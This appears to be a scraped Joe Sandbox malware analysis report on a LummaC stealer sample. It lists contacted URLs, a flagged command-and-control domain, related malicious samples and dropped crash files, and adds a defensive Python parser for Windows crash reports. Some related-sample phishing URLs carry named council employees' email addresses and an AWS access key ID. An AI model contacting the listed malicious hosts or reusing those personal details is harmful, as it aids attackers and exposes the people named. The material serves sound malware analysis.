https://www.google.com/images/branding/product/ico/googleg_lodp.ico | LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://crl.microH | LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1506334302.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://web-security-reports.services.atlassian.com/csp-report/bb-website | LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252. | LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://upx.sf.net | Amcache.hve.6.dr | false | (none) | high
http://ocsp.rootca1.amazontrust.com0: | LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://nsis.sf.net/NSIS_ErrorError | LP4a6BowQN.exe, 00000000.00000002.1994446587.0000000005AF9000.00000002.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662614324.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662371385.0000000005557000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://www.ecosia.org/newtab/ | LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | LP4a6BowQN.exe, 00000000.00000003.1452009343.00000000055B8000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://dz8aopenkvv6s.cloudfront.net | LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://dz8aopenkvv6s.cloudfront. | LP4a6BowQN.exe | false | (none) | unknown
https://ac.ecosia.org/autocomplete?q= | LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://cuddlyready.xyz/7 | LP4a6BowQN.exe, 00000000.00000003.1520684768.0000000000C13000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
https://cuddlyready.xyz:443/api | LP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1399414782.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | LP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmp | false | (none) | 
                                                                                                                                    high
                                                                                                                                    https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netLP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://cdn.cookielaw.org/LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?LP4a6BowQN.exe, 00000000.00000003.1450197489.00000000054BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9eLP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgLP4a6BowQN.exe, 00000000.00000003.1452753970.00000000054A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://remote-app-switcher.stg-east.frontend.public.atl-paas.netLP4a6BowQN.exe, LP4a6BowQN.exe, 00000000.00000003.1662962189.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.0000000005497000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662713332.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000002.1993802166.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1662738750.00000000054AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=LP4a6BowQN.exe, 00000000.00000003.1400298929.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400223917.00000000054DD000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1400160474.00000000054DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://bbuseruploads.s3.amazonaws.com/LP4a6BowQN.exe, 00000000.00000003.1662634082.0000000000BFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctaLP4a6BowQN.exe, 00000000.00000003.1474687846.0000000005496000.00000004.00000800.00020000.00000000.sdmp, LP4a6BowQN.exe, 00000000.00000003.1475117260.000000000549C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
16.182.101.249 | s3-w.us-east-1.amazonaws.com | United States | unknown | unknown | false
185.166.143.49 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
104.21.32.96 | cuddlyready.xyz | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579735
Start date and time: 2024-12-23 08:18:02 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: LP4a6BowQN.exe (renamed because the original name is a hash value)
Original Sample Name: 80429ec2b7c1a75bc06b68846eb8be34.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@3/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 4.245.163.56, 20.190.181.4, 4.175.87.197
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target LP4a6BowQN.exe, PID 7624, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:19:03 | API Interceptor | 49x Sleep call for process: LP4a6BowQN.exe modified
04:18:13 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.166.143.49 | http://jasonj002.bitbucket.io/ | malicious | HTMLPhisher | jasonj002.bitbucket.io/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
s3-w.us-east-1.amazonaws.com | zLP3oiwG1g.exe | malicious | LummaC | 52.217.67.100
s3-w.us-east-1.amazonaws.com | Yh6fS6qfTE.exe | malicious | LummaC | 52.217.18.140
s3-w.us-east-1.amazonaws.com | 5RjjCWZAVv.exe | malicious | LummaC | 52.217.203.57
s3-w.us-east-1.amazonaws.com | TmmiCE5Ulm.exe | malicious | LummaC | 3.5.16.86
s3-w.us-east-1.amazonaws.com | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 16.182.37.145
s3-w.us-east-1.amazonaws.com | EI3TafelpV.exe | malicious | LummaC | 52.216.41.233
s3-w.us-east-1.amazonaws.com | https://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.uk | malicious | Fake Captcha | 52.217.128.241
s3-w.us-east-1.amazonaws.com | https://ho8d1o.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=h4n%2BY6bT0YHF44DbJkmJeHwDnn0%3D&Expires=1734860434#mandy.pullen@peterborough.gov.uk | malicious | Fake Captcha | 52.216.142.68
s3-w.us-east-1.amazonaws.com | https://preview.micrasoft-office365.com/f5c275dd184cbe62?l=6 | malicious | Unknown | 54.231.135.57
s3-w.us-east-1.amazonaws.com | F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 54.231.224.185
cuddlyready.xyz | 0OkLsJL2Bn.exe | malicious | LummaC, Stealc | 172.67.150.173
cuddlyready.xyz | Wave-Executor.exe | malicious | LummaC | 193.143.1.9
bitbucket.org | zLP3oiwG1g.exe | malicious | LummaC | 185.166.143.48
bitbucket.org | Yh6fS6qfTE.exe | malicious | LummaC | 185.166.143.50
bitbucket.org | 5RjjCWZAVv.exe | malicious | LummaC | 185.166.143.49
bitbucket.org | TmmiCE5Ulm.exe | malicious | LummaC | 185.166.143.49
bitbucket.org | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 185.166.143.48
bitbucket.org | EI3TafelpV.exe | malicious | LummaC | 185.166.143.49
bitbucket.org | F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 185.166.143.48
bitbucket.org | D.G Governor Istek,Docx.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 185.166.143.49
bitbucket.org | credit.js | malicious | PureLog Stealer, RHADAMANTHYS | 185.166.143.48
bitbucket.org | fGZLZhXIt1.bat | malicious | Unknown | 185.166.143.48

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | 0OkLsJL2Bn.exe | malicious | LummaC, Stealc | 172.67.150.173
CLOUDFLARENETUS | zLP3oiwG1g.exe | malicious | LummaC | 104.21.36.201
CLOUDFLARENETUS | 0HdDuWzp54.exe | malicious | LummaC, Stealc | 172.67.199.72
CLOUDFLARENETUS | Yh6fS6qfTE.exe | malicious | LummaC | 104.21.36.201
CLOUDFLARENETUS | NE4jxHLxXJ.exe | malicious | LummaC, Stealc | 172.67.199.72
CLOUDFLARENETUS | U8mbM8r793.exe | malicious | LummaC, Stealc | 172.67.199.72
CLOUDFLARENETUS | ABnDy7rLFS.exe | malicious | LummaC, Stealc | 104.21.36.201
CLOUDFLARENETUS | skIYOAOzvU.exe | malicious | LummaC | 104.21.36.201
CLOUDFLARENETUS | NfwBtCx5PR.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | pJRiqnTih0.exe | malicious | LummaC | 172.67.157.254
AMAZON-02US | zLP3oiwG1g.exe | malicious | LummaC | 52.217.67.100
AMAZON-02US | Yh6fS6qfTE.exe | malicious | LummaC | 52.217.18.140
AMAZON-02US | armv6l.elf | malicious | Unknown |
                                                                                                                                                        • 54.203.164.5
                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 52.217.203.57
                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 185.166.143.48
                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 54.171.230.55
                                                                                                                                                        trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                        • 108.139.47.92
                                                                                                                                                        https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 65.9.112.70
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | 0OkLsJL2Bn.exe | malicious | LummaC, Stealc | 16.182.101.249, 185.166.143.49, 104.21.32.96
 | zLP3oiwG1g.exe | malicious | LummaC | 16.182.101.249, 185.166.143.49, 104.21.32.96
 | 0HdDuWzp54.exe | malicious | LummaC, Stealc | 16.182.101.249, 185.166.143.49, 104.21.32.96
 | Yh6fS6qfTE.exe | malicious | LummaC | 16.182.101.249, 185.166.143.49, 104.21.32.96
 | NE4jxHLxXJ.exe | malicious | LummaC, Stealc | 16.182.101.249, 185.166.143.49, 104.21.32.96
 | OGBLsboKIF.exe | malicious | LummaC | 16.182.101.249, 185.166.143.49, 104.21.32.96
 | U8mbM8r793.exe | malicious | LummaC, Stealc | 16.182.101.249, 185.166.143.49, 104.21.32.96
 | ABnDy7rLFS.exe | malicious | LummaC, Stealc | 16.182.101.249, 185.166.143.49, 104.21.32.96
 | skIYOAOzvU.exe | malicious | LummaC | 16.182.101.249, 185.166.143.49, 104.21.32.96
 | NfwBtCx5PR.exe | malicious | LummaC | 16.182.101.249, 185.166.143.49, 104.21.32.96
                                                                                                                                                        No context
                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):65536
                                                                                                                                                        Entropy (8bit):1.0455895091566931
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:e6T5e3ol0BU/HzUjudxhYfzuiFuZ24IO8EyA:g37BU/AjjzuiFuY4IO8S
                                                                                                                                                        MD5:61CE78251C0C33A253C63FA58EEA9613
                                                                                                                                                        SHA1:E20D77E5B29229D0E1B325E12D8E2E35413D4D4C
                                                                                                                                                        SHA-256:77E48ABD31312C92ADA16F4B67DEB9132D9E4FF5D01986D45E02EBFC53BF77E6
                                                                                                                                                        SHA-512:6B0480AFD78E7814552AB09245F44652219FB9A46F3F89659891106DC5C90E274DB0EDD4CF78A3D4FAAB8908EAB75CAF4B5842787893732D7F7DFAF68D79AB3D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.1.9.0.6.2.3.9.7.6.8.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.1.9.0.6.2.9.1.3.2.9.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.4.a.f.1.e.2.-.e.6.f.4.-.4.7.f.b.-.a.3.a.f.-.0.b.b.b.3.b.f.f.3.8.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.0.8.9.9.f.0.-.d.d.6.8.-.4.1.d.9.-.b.e.5.1.-.d.0.3.e.4.6.8.7.d.9.e.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.P.4.a.6.B.o.w.Q.N...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.c.8.-.0.0.0.1.-.0.0.1.4.-.1.5.5.f.-.c.b.e.f.0.a.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.3.e.d.0.6.c.6.b.f.c.b.b.b.9.a.b.5.5.6.f.e.f.c.7.9.5.b.1.2.f.0.0.0.0.f.f.f.f.!.0.0.0.0.b.5.8.d.0.a.c.b.e.f.2.a.f.5.3.e.2.d.5.0.7.c.f.d.4.f.b.3.c.0.7.e.a.5.d.6.a.9.1.e.!.L.P.4.a.6.B.o.w.Q.N...e.x.e.....T.a.r.g.e.t.A.p.p.
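The dropped file above is WerFault's Report.wer for the crash of LP4a6BowQN.exe. Its preview is UTF-16LE key=value text (hence the dotted rendering) and carries NsAppName, a FILETIME EventTime and a TargetAppId that embeds the SHA1 of the crashed image. That makes it a useful forensic artifact: even when a stealer removes itself, the WER report ties the crash to the binary's name and hash. The Python below is an added example, not part of the Joe Sandbox report. Its input is constructed from the values visible in the preview, and the TargetAppId layout it relies on (fields separated by `!`, the second one ending in the 40-hex SHA1) is inferred from that preview rather than from a documented format. The SHA1 it recovers is the submitted sample's SHA1, and the EventTime decodes to the same 09:17:42 UTC that the minidump entry below carries.

```python
"""Pull the crashed binary's name, SHA1 and crash time out of a WER Report.wer.

Added example (not Joe Sandbox code).  Report.wer is UTF-16LE key=value text
with CRLF line ends; the TargetAppId layout used here is inferred from the
preview in this report, not from a documented format."""
import re
from datetime import datetime, timedelta, timezone
from typing import Dict, Optional, Tuple

# Constructed input: keys and values copied from this report's preview,
# re-encoded the way WerFault.exe writes the file (BOM + UTF-16LE + CRLF).
SAMPLE_WER = b"\xff\xfe" + (
    "Version=1\r\n"
    "EventType=APPCRASH\r\n"
    "EventTime=133794190623976815\r\n"
    "ReportType=2\r\n"
    "NsAppName=LP4a6BowQN.exe\r\n"
    "TargetAppId=W:00068f3ed06c6bfcbbb9ab556fefc795b12f0000ffff!"
    "0000b58d0acbef2af53e2d507cfd4fb3c07ea5d6a91e!LP4a6BowQN.exe\r\n"
).encode("utf-16-le")

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_wer(data: bytes) -> Dict[str, str]:
    """Decode the report (BOM-aware) into a key -> value dict."""
    text = data.decode("utf-16")
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def filetime_to_utc(ticks: int) -> datetime:
    """EventTime is a FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def crashed_binary(fields: Dict[str, str]) -> Tuple[Optional[str], Optional[str]]:
    """Return (image name, SHA1 of the image) from TargetAppId.

    Assumption taken from the preview: TargetAppId is '!'-separated and its
    second element ends in the 40-hex SHA1 of the executable that crashed."""
    parts = fields.get("TargetAppId", "").split("!")
    sha1 = None
    if len(parts) >= 2:
        m = re.search(r"([0-9a-f]{40})$", parts[1])
        if m:
            sha1 = m.group(1)
    name = fields.get("NsAppName") or (parts[-1] if len(parts) >= 3 else None)
    return name, sha1


def summarize(data: bytes) -> Dict[str, Optional[str]]:
    """One-shot triage: which image crashed, its hash, and when (UTC)."""
    fields = parse_wer(data)
    name, sha1 = crashed_binary(fields)
    when = None
    if fields.get("EventTime", "").isdigit():
        when = filetime_to_utc(int(fields["EventTime"])).strftime("%Y-%m-%d %H:%M:%S UTC")
    return {"event": fields.get("EventType"), "image": name, "sha1": sha1, "time": when}


if __name__ == "__main__":
    print(summarize(SAMPLE_WER))
```

On a live system the same parser runs over the Report.wer files under `C:\ProgramData\Microsoft\Windows\WER\ReportArchive` and `ReportQueue`; the recovered SHA1 is what you pivot on when the original executable is no longer on disk.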
                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 09:17:42 2024, 0x1205a4 type
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):285762
                                                                                                                                                        Entropy (8bit):1.4909368944017303
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:1FcnmWFltY6eoPhxrBk5J57H+6qzEqs7aA:ncmIltY6eoPhxOja6qIpD
                                                                                                                                                        MD5:0A1DD15304850A5EFFDA28F11B4B535A
                                                                                                                                                        SHA1:E54A477659EA83601A17FF8982D0B15D1A6341EA
                                                                                                                                                        SHA-256:053982B7F7A5149CBEB68B285C097F95C74217B8B6BE4D018DBBD8695F69A230
                                                                                                                                                        SHA-512:969A7D4D127A3FA83F9F0523D188E4FF8D1B8641E6C9668D005DEBB7F3386704E58D5A339770F98237883B509D60C114AF78C64326B75C03E2566481D225F85D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:MDMP..a..... ........*ig....................................D....'..........L...........`.......8...........T............L..B............(...........*..............................................................................eJ......`+......GenuineIntel............T.............ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):8390
                                                                                                                                                        Entropy (8bit):3.7019458930761537
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:R6l7wVeJeDQ6CQ6YN4SUF8MtgmfCx5pr089b91sf5v/m:R6lXJr6t6YSSUiWgmfY19Of0
                                                                                                                                                        MD5:B28D325812B69134A536863B44E1D1A7
                                                                                                                                                        SHA1:9B177F2CA6145FB9969E3F3E2D9A7353BDBB64E1
                                                                                                                                                        SHA-256:40B5B4E9C44D249181EBBFF8A816DE741A598A0AE154A8298EE129404489F20B
                                                                                                                                                        SHA-512:C788A1B1E8D67BFE90DA954A32C7861FC5E4FA28234422A5E57F5D86E95D77B881535D16CB0C80EC53D4671F5B8761CC2C38C4340234260F4FD49C23A6A99ECD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.2.4.<./.P.i.
                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4624
                                                                                                                                                        Entropy (8bit):4.507311376001826
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:cvIwWl8zsnviJg77aI9NCWpW8VYJXYm8M4JtKxFP6+q826kQHPzACsd:uIjfnvwI7PD7VxJc6jqPzACsd
                                                                                                                                                        MD5:FB9631A0B54AB2078EB1A4C3EC0BC92D
                                                                                                                                                        SHA1:4694F9D3DB61F76C91BA769AC710876D7D39444A
